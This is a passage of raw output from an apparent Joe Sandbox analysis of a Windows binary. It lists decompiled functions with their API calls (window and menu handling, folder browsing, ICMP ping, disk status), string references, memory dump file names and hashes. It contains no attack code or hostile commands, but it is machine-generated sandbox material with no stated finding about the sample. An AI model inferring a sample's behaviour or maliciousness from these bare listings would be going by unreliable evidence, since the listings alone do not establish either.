FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F64FEC
SetActiveWindow.USER32 ref: 00F6500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F65019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F65038
Sleep.KERNEL32(000000FA), ref: 00F65043
IsWindow.USER32 ref: 00F6504F
EndDialog.USER32(00000000), ref: 00F65060

Strings

BUTTON, xrefs: 00F64FDE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0720328896432ada56c6c543105e9cbc5779b93fe3cbdbf235f0987a829c7f5f
Instruction ID: 013a216b881b289f96be13387933f778c326701a111859d31cb0cb99d13f01a7
Opcode Fuzzy Hash: 0720328896432ada56c6c543105e9cbc5779b93fe3cbdbf235f0987a829c7f5f
Instruction Fuzzy Hash: C721CF7060460DBFE7106F20EE8AFB63BA9EF04B55F281424F002C31B5DB219D54BB62

Function 00F6D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CoInitialize.OLE32(00000000), ref: 00F6D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F6D67D
SHGetDesktopFolder.SHELL32(?), ref: 00F6D691
CoCreateInstance.OLE32(00F92D7C,00000000,00000001,00FB8C1C,?), ref: 00F6D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F6D74C
CoTaskMemFree.OLE32(?,?), ref: 00F6D7A4
_memset.LIBCMT ref: 00F6D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00F6D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F6D840
CoTaskMemFree.OLE32(00000000), ref: 00F6D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F6D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00F6D880

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 2857816a55db82aecbd2a5c95eac437e15563a64ed81340f160b05514c04b086
Instruction ID: 4434763ca96be5fedc0f36df81dbae4a0ef3b3b286cfe7474b067185dc49d760
Opcode Fuzzy Hash: 2857816a55db82aecbd2a5c95eac437e15563a64ed81340f160b05514c04b086
Instruction Fuzzy Hash: 3AB1FB75A00109AFDB04DFA4CC88DAEBBB9FF49314F148469E909EB261DB34ED45DB50

Function 00F5C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00F5C283
GetWindowRect.USER32(00000000,?), ref: 00F5C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F5C2F3
GetDlgItem.USER32(?,00000002), ref: 00F5C2FE
GetWindowRect.USER32(00000000,?), ref: 00F5C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F5C364
GetDlgItem.USER32(?,000003E9), ref: 00F5C372
GetWindowRect.USER32(00000000,?), ref: 00F5C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F5C3C6
GetDlgItem.USER32(?,000003EA), ref: 00F5C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F5C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00F5C3FE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
Instruction ID: 998587c9bfc0d29e4957c1b5cb6e85fd75fecb47e858c13a7d604c78fc89c438
Opcode Fuzzy Hash: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
Instruction Fuzzy Hash: 2D514171B00209AFDB18CFA9DD89AADBBB5EB88311F14812DFA16D7290D7709D449B50

Function 00F0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
DestroyAcceleratorTable.USER32(00000000), ref: 00F3BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F3BD0A
DeleteObject.GDI32(00000000), ref: 00F3BD1C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 95f2f3a1b22d471ebf9f99ff25125415d6c6e903367a9acc0a1a195caf7ba5cf
Instruction ID: a0a3352be1de785ec8cd53f5251556908a0611a059ba33c61c3b300300bb02ba
Opcode Fuzzy Hash: 95f2f3a1b22d471ebf9f99ff25125415d6c6e903367a9acc0a1a195caf7ba5cf
Instruction Fuzzy Hash: F6617832900B08DFDB359F14DE59B2AB7F1FF40722F508529E5428B9A0C774A891FB60

Function 00F021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

GetSysColor.USER32(0000000F), ref: 00F021D3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a948877962f030914d58cab23387d255699d2e6e030ac4e08fd525707c62998b
Instruction ID: 8a6e8ab27843bc2c5e81c7d1a73ab64b94e1beb4ff47e24e6c929c3408a1333f
Opcode Fuzzy Hash: a948877962f030914d58cab23387d255699d2e6e030ac4e08fd525707c62998b
Instruction Fuzzy Hash: AE419E31500544EFEB615F68EC9CBB93B66EB46331F284265FE658A1E1C7318C86FB21

Function 00F6A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F8F910), ref: 00F6A90B
GetDriveTypeW.KERNEL32(00000061,00FB89A0,00000061), ref: 00F6A9D5
_wcscpy.LIBCMT ref: 00F6A9FF

Strings

fixed, xrefs: 00F6A953
all, xrefs: 00F6A911
removable, xrefs: 00F6A93D
network, xrefs: 00F6A969
ramdisk, xrefs: 00F6A97F
unknown, xrefs: 00F6A996
cdrom, xrefs: 00F6A927

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fd77f69ef15a8be1d8c3aba666d2ae6824d5192739bea6982c4615f3f3854705
Instruction ID: 2cf7b2167bb210b05d513a74a188aee29ce2ec82168ce783f9f7b297421e0461
Opcode Fuzzy Hash: fd77f69ef15a8be1d8c3aba666d2ae6824d5192739bea6982c4615f3f3854705
Instruction Fuzzy Hash: 1551AB325083019BC700EF14CC92AAFB7A5EF84754F54482DF496672A2EB75D909EE53

Function 00F09837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00F09862
__swprintf.LIBCMT ref: 00F098AC
__i64tow.LIBCMT ref: 00F3F5E6

Strings

False, xrefs: 00F3F5AE
%.15g, xrefs: 00F098A6
0x%p, xrefs: 00F3F5C8
True, xrefs: 00F3F5A7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 06c1d488483471922181eb8b803a439607e35ebffd187c908e30e5fa85111a10
Instruction ID: 6addae5e0465237a358d633f26d2ff368adc4064d06f975667967b1398bb55f9
Opcode Fuzzy Hash: 06c1d488483471922181eb8b803a439607e35ebffd187c908e30e5fa85111a10
Instruction Fuzzy Hash: 3141E572D04205AFDB24EF34DC42E7A73E8EF45320F64446EE549D6292EA75D906FB10

Function 00F87152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8716A
CreateMenu.USER32 ref: 00F87185
SetMenu.USER32(?,00000000), ref: 00F87194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87221
IsMenu.USER32(?), ref: 00F87237
CreatePopupMenu.USER32 ref: 00F87241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F8726E
DrawMenuBar.USER32 ref: 00F87276

Strings

F, xrefs: 00F87262
0, xrefs: 00F87160

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: c710dc84be1fa3818a50dedae577d68d13a38f4b3dc32702a8ddc3c390be70b5
Instruction ID: 7c7cd0c9dc4400f08d0cf30765189e8d13987187d85189d95dfc4c16fcb15f6a
Opcode Fuzzy Hash: c710dc84be1fa3818a50dedae577d68d13a38f4b3dc32702a8ddc3c390be70b5
Instruction Fuzzy Hash: 05412675A01209AFDB10EFA4D988FEABBB5FF49310F240029F915A7361D731A914EF90

Function 00F874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F8755E
CreateCompatibleDC.GDI32(00000000), ref: 00F87565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F87578
SelectObject.GDI32(00000000,00000000), ref: 00F87580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F8758B
DeleteDC.GDI32(00000000), ref: 00F87594
GetWindowLongW.USER32(?,000000EC), ref: 00F8759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F875BE

Strings

static, xrefs: 00F874F6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 499efb25733614165bc878413930deeb638e97cddeb61ce8d36dfb705060ad51
Instruction ID: ebab2019ecebb57accbdb9bc33ca27ab5a91c43ca6c9b612953a33cf99e2a44e
Opcode Fuzzy Hash: 499efb25733614165bc878413930deeb638e97cddeb61ce8d36dfb705060ad51
Instruction Fuzzy Hash: A1316B32504218BFDF11AF64DC09FEB3B69FF09321F250224FA15A61A0D735D825EBA4

Function 00F26E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F26E3E

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

__gmtime64_s.LIBCMT ref: 00F26ED7
__gmtime64_s.LIBCMT ref: 00F26F0D
__gmtime64_s.LIBCMT ref: 00F26F2A
__allrem.LIBCMT ref: 00F26F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F26F9C
__allrem.LIBCMT ref: 00F26FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F26FD1
__allrem.LIBCMT ref: 00F26FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F27006
__invoke_watson.LIBCMT ref: 00F27077

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 4e9f177d3cbe2c77c42c3363f5998e335c861c0098c969805a31cf1fc71959d8
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 47710676E00B26ABDB14EF78EC41B5AB7A8AF04774F144229F514D72C1E774ED04A790

Function 00F62527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62542
GetMenuItemInfoW.USER32(00FC5890,000000FF,00000000,00000030), ref: 00F625A3
SetMenuItemInfoW.USER32(00FC5890,00000004,00000000,00000030), ref: 00F625D9
Sleep.KERNEL32(000001F4), ref: 00F625EB
GetMenuItemCount.USER32(?), ref: 00F6262F
GetMenuItemID.USER32(?,00000000), ref: 00F6264B
GetMenuItemID.USER32(?,-00000001), ref: 00F62675
GetMenuItemID.USER32(?,?), ref: 00F626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F62700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62735

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 8ffb5d9b0d17db1a39384b69efe2b1a91a5689ae5f5786c1e8ccfa00527e6e46
Instruction ID: cf505b049631f6662f6e1ab85c9d17fd1bb22741084bc2fdad9dd708609b1daf
Opcode Fuzzy Hash: 8ffb5d9b0d17db1a39384b69efe2b1a91a5689ae5f5786c1e8ccfa00527e6e46
Instruction Fuzzy Hash: 7861A0B1900A49AFDB61CFA4DD88EFE7BB8FB01354F140069E842A7251D735AD05FB21

Function 00F86F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F86FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F86FA8
GetWindowLongW.USER32(?,000000F0), ref: 00F86FCC
_memset.LIBCMT ref: 00F86FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F86FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F87067

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: eb1bf3952cb50832d9384553a88ed134f878a8988440c1a5039c1cb092d690ce
Instruction ID: bf30e42e2954689af2819387a3339205575461edfab2d9240ae32b6a8ed463da
Opcode Fuzzy Hash: eb1bf3952cb50832d9384553a88ed134f878a8988440c1a5039c1cb092d690ce
Instruction Fuzzy Hash: 85616A75900208AFDB11EFA4CD85FEE77B8EB09710F200159FA14EB2A1D775AD45EBA0

Function 00F56B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F56BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00F56C18
VariantInit.OLEAUT32(?), ref: 00F56C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F56C4A
VariantCopy.OLEAUT32(?,?), ref: 00F56C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F56CB1
VariantClear.OLEAUT32(?), ref: 00F56CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00F56CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F56CDC
VariantClear.OLEAUT32(?), ref: 00F56CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F56CF9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: beff9f64c3230bdc4c541703983adca7b1ba19942edfd214237117d4bd07feb5
Instruction ID: b83a9d73e2edc774cf57a797faf3525c0d5501a82379efaf1145cafd0db7b272
Opcode Fuzzy Hash: beff9f64c3230bdc4c541703983adca7b1ba19942edfd214237117d4bd07feb5
Instruction Fuzzy Hash: 1A415271A0011DAFCF00DF64DC489EEBBB9EF48351F408069EA55E7261DB35A949EF90

Function 00F75732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F75793
inet_addr.WSOCK32(?,?,?), ref: 00F757D8
gethostbyname.WSOCK32(?), ref: 00F757E4
IcmpCreateFile.IPHLPAPI ref: 00F757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F758ED
WSACleanup.WSOCK32 ref: 00F758F3

Strings

Ping, xrefs: 00F75816

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4655b4b0fe04db226f76793105ebab50e73cda396c0c1dad84cb9e694f68737a
Instruction ID: 4f5601a374dfcb68cecca87947c327a2cc397f1aec3a9be8061a9728b32bec80
Opcode Fuzzy Hash: 4655b4b0fe04db226f76793105ebab50e73cda396c0c1dad84cb9e694f68737a
Instruction Fuzzy Hash: 94515F71A046009FDB109F24DC45B6A7BE4EF48B20F14856AF95ADB2E1DBB4E904EB43

Function 00F6B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F6B546
GetLastError.KERNEL32 ref: 00F6B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00F6B5BD

Strings

UNKNOWN, xrefs: 00F6B575
NOTREADY, xrefs: 00F6B57C
READONLY, xrefs: 00F6B588
READY, xrefs: 00F6B596
INVALID, xrefs: 00F6B58F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
